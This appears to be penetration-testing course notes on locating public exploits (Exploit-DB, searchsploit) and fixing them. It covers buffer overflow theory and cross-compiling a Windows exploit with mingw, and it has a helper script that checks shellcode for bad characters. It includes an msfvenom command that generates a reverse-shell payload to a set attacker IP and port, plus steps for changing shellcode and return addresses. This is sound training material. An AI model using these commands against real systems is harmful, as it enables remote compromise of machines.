
Locating and Fixing Public Exploits

Online exploit resources

Exploit Database, aka Exploit-DB - https://www.exploit-db.com/
D column is download
A lists vulnerable application files of the exploit, which we can download for research and testing
V marks whether the exploit has been verified
Type designates the exploit as dos, local, remote, or webapp
Platform designates the system affected by the exploit. This can be an operating system, hardware, or a code language/service (php)

Packet Storm - https://packetstormsecurity.com/

GitHub

We can also use Google dorking to try and locate specific exploits.

OffSec has a GitHub account where we can find different repositories like exploitdb-bin-sploits, which contains pre-compiled exploits for easy execution.

Offline resources

Metasploit Framework
Core Impact - paid for
Canvas - paid for
Browser Exploitation Framework (BeEF) - pentest tool focused on client-side attacks from a web browser

Searchsploit command to update:

sudo apt update && sudo apt install exploitdb

nmap scripts are located under /usr/share/nmap/scripts. We can get more info for a script by running nmap with the --script-help flag, e.g.

nmap --script-help=clamav-exec.nse

Fixing Public Exploits

Fixing memory corruption exploits

Memory corruption exploits, such as buffer overflows, are relatively complex and can be difficult to modify.

Buffer Overflow Theory

In general, a buffer is a memory area intended to hold content that is often sent by the user. Some buffers have a dynamic size, but some are fixed or preallocated. Buffer overflows can occur either on the heap or the stack. The heap is dynamically managed and typically stores large chunks of globally-accessible data. The stack's function is to store local functions' data. If an attacker can overwrite the return address located after the buffer, they can control the next code to execute. An attacker will overwrite the return address with a valid mapped memory address that leads execution to the shellcode.

General flow of buffer overflow attacks
1. Create a large buffer to trigger the overflow
2. Take control of EIP by overwriting a return address on the stack, padding the large buffer with the appropriate offset
3. Include a chosen payload in the buffer, prepended by an optional NOP sled
4. Choose a correct return address instruction such as JMP ESP to redirect the execution flow to the payload

We may need to modify file paths, IP addresses, ports, URLs, and more. If these modifications change the offset, we need to adjust the buffer length accordingly.

If we get an exploit that uses Windows headers, we may need to cross compile it on Kali Linux.

We can use the mingw-w64 cross compiler. Install it using

sudo apt install mingw-w64

Then we can cross compile an executable using the command

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe

Sometimes there will be errors when cross compiling. In the case of this exploit there are errors for undefined functions. After googling the first one, it appears the missing functions are declared in winsock.h, so we can add the -lws2_32 parameter (link against the ws2_32 Winsock library) to resolve the issue.

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

With the -l option while compiling we can instruct mingw-w64 to search for the named library (here ws2_32) and link it into the final executable.

Don't forget to update any hard-coded IP and port values.

Changing shellcode

Sometimes we will need to change the shellcode of a buffer overflow exploit. It may contain invalid (bad) characters, or we may need to update the payload.

Bad characters: "\x00\x0a\x0d\x25\x26\x2b\x3d"

We can generate new shellcode using msfvenom, encoding it to avoid the bad characters:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
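Before pasting regenerated shellcode into an exploit it is worth checking two things the notes above call out: that none of the bad characters survived the encoder, and that the new payload (plus any NOP sled) still fits in the space before the return address so the offset does not change. The following is an added example, not code from the notes or from OffSec; it parses the "-f c" output layout that msfvenom emits (a C char array of \xNN escapes) and runs both checks. The sample arrays, the byte values in them, and the budget numbers are all constructed for the example and are not a working payload.

```python
import re

# Bad characters listed in the notes for this target; none may appear in the shellcode.
BAD_CHARS = b"\x00\x0a\x0d\x25\x26\x2b\x3d"

# Constructed sample in the layout msfvenom's "-f c" output uses. The bytes are
# arbitrary values chosen for the example, not a working payload.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\x90\x90\x90\x90\x31\xc0\x50\x68\x63\x61\x6c\x63"
"\x54\x59\x50\x40\x92\x74\x15\x51\x64\x8b\x72\x30";
'''

# Constructed sample that deliberately contains bad characters, to show the check firing.
SAMPLE_WITH_BAD = r'''
unsigned char buf[] =
"\x90\x00\x31\x0a\x25\xc0";
'''

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_c_shellcode(text: str) -> bytes:
    """Collect every \\xNN escape found inside the double-quoted fragments.

    Only the quoted string pieces are scanned, so the array name, the type
    and any trailing comment in the msfvenom output are ignored.
    """
    out = bytearray()
    for fragment in _QUOTED.findall(text):
        out.extend(int(h, 16) for h in _ESCAPE.findall(fragment))
    return bytes(out)


def find_bad_chars(shellcode: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs for every forbidden byte in the shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def fits_in_budget(shellcode: bytes, budget: int, nop_sled: int = 0) -> bool:
    """True if the NOP sled plus shellcode fits in the bytes reserved before the return address."""
    return nop_sled + len(shellcode) <= budget


def check(text: str, budget: int, nop_sled: int = 0) -> dict:
    """Run both checks on one msfvenom "-f c" output and summarise the result."""
    sc = parse_c_shellcode(text)
    return {
        "length": len(sc),
        "bad": find_bad_chars(sc),
        "fits": fits_in_budget(sc, budget, nop_sled),
    }


if __name__ == "__main__":
    # Budget of 400 bytes and a 16-byte sled are constructed values for the demo.
    for name, sample in (("clean", SAMPLE_C_OUTPUT), ("dirty", SAMPLE_WITH_BAD)):
        print(name, check(sample, budget=400, nop_sled=16))
```

If "bad" is non-empty, re-run msfvenom with the offending bytes added to -b (or try another encoder); if "fits" is False, the payload is longer than the original and the buffer layout from step 2 of the overflow flow has to be recomputed rather than just pasted over.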

Changing the return address

Sometimes we will need to change the return address of an exploit. For example, if the address of a JMP ESP instruction points to a library that is not present on the target, we need to find a new address. We can reference other versions of the exploit, if multiple exploits are available. If this isn't an option, we have a few alternatives. We can create a sandbox environment and test/find a new address --> this is not the best option, because ASLR now randomizes the memory addresses of DLLs in Windows.

Fixing Web Exploits